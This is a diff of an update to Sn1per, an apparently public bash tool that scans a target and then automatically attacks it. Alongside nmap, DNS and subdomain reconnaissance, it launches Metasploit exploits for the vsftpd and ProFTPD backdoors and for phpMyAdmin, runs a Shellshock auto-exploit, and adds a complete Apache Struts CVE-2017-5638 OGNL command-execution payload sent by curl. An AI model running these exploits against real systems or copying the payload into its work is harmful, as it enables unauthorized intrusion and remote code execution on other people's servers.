 	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
@@ -68,35 +173,16 @@ if [ -z $TARGET ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e ""
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
-	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3$RESET"
-	echo -e "$OKORANGE + -- --=[Usage: sn1per <target>$RESET"
+	echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
+	echo -e "$OKORANGE + -- --=[Usage: sniper <target>$RESET"
 	echo ""
 	exit
 fi
 
-function loot {
-	echo -e "$OKRED                ____               $RESET"
-	echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
-	echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
-	echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
-	echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
-	echo -e "$OKRED               /_/                 $RESET"
-	echo ""
-	cd $LOOT_DIR
-	echo -e "$OKORANGE + -- --=[Sorting loot directory ($LOOT_DIR)"
-	echo -e "$OKORANGE + -- --=[Generating reports..."
-	for a in `ls sniper-*.txt 2>/dev/null`; 
-	do 
-		echo "$a" > $LOOT_DIR/reports/$a
-		sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a
-		mv $a $LOOT_DIR/output/
-	done
-	rm -f $LOOT_DIR/.fuse_* 2> /dev/null
-	echo -e "$OKORANGE + -- --=[Opening loot directory..."
-	iceweasel $LOOT_DIR &> /dev/null &
-	zenmap -f $LOOT_DIR/nmap/ &> /dev/null &
-	echo -e "$OKORANGE + -- --=[Done!"
-}
+if [[ $TARGET = "--help" ]]; then
+	help
+	exit
+fi
 
 if [[ ${TARGET:0:1} =~ $REGEX ]]; 
 	then 
@@ -105,8 +191,6 @@ else
 	SCAN_TYPE="DOMAIN"
 fi
 
-#clear
-
 if [ "$MODE" = "report" ]; then
 	sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
 	exit
@@ -138,7 +222,7 @@ if [ "$MODE" = "discover" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET"
 	arp -a -n
 	echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET"
-	unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
+	unicornscan $TARGET 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt
 	echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET"
 	cat $LOOT_DIR/domains/sniper-ips.txt
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET"
@@ -176,7 +260,7 @@ if [ "$MODE" = "stealth" ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e "$RESET"
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
+	echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
 	echo -e "$OKRED " 	
 	echo -e "$OKRED     ./\."
 	echo -e "$OKRED   ./    '\."
@@ -220,20 +304,31 @@ if [ "$MODE" = "stealth" ]; then
 		echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 		dig -x $TARGET
 		dnsenum $TARGET
-		mv -f *_ips.txt $LOOT_DIR/ 2>/dev/null
+		mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 		echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-		python Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+		python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 		dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+		echo ""
+		echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
+		echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
+		echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
+		echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
+		echo -e "$OKBLUE"
+		curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
+		echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
+		cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null	
+		cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null	
+		sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
+		rm -f /tmp/curl.out 2> /dev/null	
+		echo -e "$RESET"
 		echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
-		for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done;
+		for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus" 2>/dev/null; done;
 		echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-		python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
+		python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
 	fi
 	echo ""
 	echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
-	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
-	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
+	nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	
 	port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 	port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -269,11 +364,25 @@ if [ "$MODE" = "stealth" ]; then
 		sslscan --no-failed $TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
 		cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
-		echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$a-port443.jpg"
+		echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$TARGET-port443.jpg"
 	fi
 	
 	echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
-	loot
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
+	echo -e ""
 	rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
 	exit
 fi
@@ -291,7 +400,7 @@ if [ "$MODE" = "airstrike" ]; then
 	echo -e "$OKRED               /_/                 $RESET"
 	echo -e "$RESET"
 	echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-	echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
+	echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
 
 	for a in `cat $TARGET`;
 	do
@@ -342,16 +451,29 @@ if [ "$MODE" = "airstrike" ]; then
 			dnsenum $a
 			mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 			echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-			python Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
+			python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
 			dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null
+			echo ""
+			echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
+			echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
+			echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
+			echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
+			echo -e "$OKBLUE"
+			curl -s https://crt.sh/?q=%25.$a > /tmp/curl.out && cat /tmp/curl.out | grep $a | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$a-crt.txt && cat $LOOT_DIR/domains/domains-$a-crt.txt
+			echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$a-full.txt"
+			cat $LOOT_DIR/domains/domains-$a-crt.txt > /tmp/curl.out 2> /dev/null	
+			cat $LOOT_DIR/domains/domains-$a.txt >> /tmp/curl.out 2> /dev/null	
+			sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$a-full.txt
+			rm -f /tmp/curl.out 2> /dev/null	
+			echo -e "$RESET"
 			echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
-			for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
+			for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
 			echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-			python SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
+			python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null
 		fi
 		echo ""
 		echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
-		nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml
+		nmap -sS -T5 --open -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
 		
 		port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
 		port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
@@ -391,7 +513,6 @@ if [ "$MODE" = "airstrike" ]; then
 		fi
 		
 		echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
-		loot
 		echo -e ""
 		echo -e ""
 		echo -e ""
@@ -411,6 +532,23 @@ if [ "$MODE" = "airstrike" ]; then
 	exit
 fi
 
+if [ "$MODE" = "fullportonly" ]; then
+	echo -e "$OKRED    ___     ____              __            __    $RESET"
+	echo -e "$OKRED   / _/_ __/ / /__  ___  ____/ /____  ___  / /_ __$RESET"
+	echo -e "$OKRED  / _/ // / / / _ \/ _ \/ __/ __/ _ \/ _ \/ / // /$RESET"
+	echo -e "$OKRED /_/ \_,_/_/_/ .__/\___/_/  \__/\___/_//_/_/\_, / $RESET"
+	echo -e "$OKRED            /_/                            /___/  $RESET"
+	echo -e "$RESET"
+	echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
+	if [ -z "$OPT1" ]; then
+		nmap -T4 -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p 1-65535 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	else 
+		nmap -T4 -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p $OPT1 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	fi
+	echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
+	exit
+fi
+
 if [ "$MODE" = "port" ]; then
 	if [ -z "$OPT1" ]; then
 		echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
@@ -467,7 +605,7 @@ echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 echo -e "$OKRED               /_/                 $RESET"
 echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[http://crowdshield.com"
-echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3"
+echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
 echo -e "$RESET"
 echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
 nslookup $TARGET
@@ -483,14 +621,27 @@ then
 	echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
 	dig -x $TARGET
 	dnsenum $TARGET
-	mv -f *_ips.txt $LOOT_DIR/ 2>/dev/null
+	mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
 	echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
-	python Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+	python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
 	dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
+	echo ""
+	echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
+	echo -e "$OKRED ║  ╠╦╝ ║ ╚═╗╠═╣$RESET"
+	echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
+	echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
+	echo -e "$OKBLUE"
+	curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
+	echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
+	cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null	
+	cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null	
+	sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
+	rm -f /tmp/curl.out 2> /dev/null	
+	echo -e "$RESET"
 	echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
-	for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
+	for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus' 2>/dev/null; done;
 	echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
-	python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
+	python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
 fi
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET"
@@ -498,18 +649,16 @@ ping -c 1 $TARGET
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
 if [ -z "$OPT1" ]; then
-	nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
-	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-	nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
+	nmap -sS -T5 --open -P0 -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 elif [ "$OPT1" == "web" ]; then
-	nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	nmap -sV -T5 -P0 -p 80,443  --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 else
-	nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	nmap -sS -T5 -P0 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
-	nmap -sU -T5 -p U:$OPT1 --open $TARGET
+	nmap -sU -T5 -P0 -p U:$OPT1 --open $TARGET
 fi
 
-service postgresql start
+if [ -z $DISABLE_POSTGRESQL ]; then service postgresql start; fi
 
 echo ""
 echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET"
@@ -542,9 +691,11 @@ port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_5984=`grep 'portid="5984"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -553,6 +704,10 @@ port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_27018=`grep 'portid="27018"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_27019=`grep 'portid="27019"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
+port_28017=`grep 'portid="28017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 
 if [ -z "$port_21" ];
@@ -560,7 +715,7 @@ then
 	echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"	
-	nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
+	nmap -A -sV  -sC -T5 -p 21 --script=ftp-* $TARGET
 	msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
 fi
 
@@ -569,10 +724,10 @@ then
 	echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
-	cd ssh-audit
+	cd $PLUGINS_DIR/ssh-audit
 	python ssh-audit.py $TARGET:22
-	cd ..
-	nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
+	cd $INSTALL_DIR
+	nmap -A -sV  -sC -T5 -p 22 --script=ssh-* $TARGET
 	msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
 fi
 
@@ -583,7 +738,7 @@ else
 	echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
 	echo ""
 	cisco-torch -A $TARGET
-	nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
+	nmap -A -sV  -T5 --script=telnet* -p 23 $TARGET
 	msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
 fi
 
@@ -592,7 +747,7 @@ then
 	echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
+	nmap -A -sV  -T5 --script=smtp* -p 25 $TARGET
 	smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
 	msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" 
 fi
@@ -602,7 +757,7 @@ then
 	echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
-	nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET	
+	nmap -A -sU -sV  -T5 --script=dns* -p U:53,T:53 $TARGET	
 fi
 
 if [ -z "$port_79" ];
@@ -610,7 +765,7 @@ then
 	echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=finger* -p 79 $TARGET
+	nmap -A -sV  -T5 --script=finger* -p 79 $TARGET
 	bin/fingertool.sh $TARGET $USER_FILE
 fi
 
@@ -642,6 +797,9 @@ else
 	echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10
 	echo ""
+	echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
+	curl -s --insecure http://$TARGET | egrep -i meta --color=auto | tail -n 10
+	echo ""
 	echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
 	curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10
 	echo ""
@@ -684,7 +842,7 @@ else
 	then
 		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
 		echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
-		nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
+		nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
 		dirb http://$TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -697,20 +855,31 @@ else
 		echo ""
 		python $CMSMAP -t http://$TARGET/wordpress/
 		echo ""
-		echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET"
-		uniscan -u http://$TARGET -qweds
+		echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
+		mkdir -p $INSTALL_DIR/loot/web/$TARGET-http/ 2> /dev/null
+		arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-http/ --output-only-positives http://$TARGET
+		cd $INSTALL_DIR/loot/web/$TARGET-http/
+		arachni_reporter $INSTALL_DIR/loot/web/$TARGET-http/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
+		unzip $INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
+		cd $INSTALL_DIR
 		echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
 		sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
 		echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
 		msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
 		echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
 		python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
+		echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
+		curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
 	fi
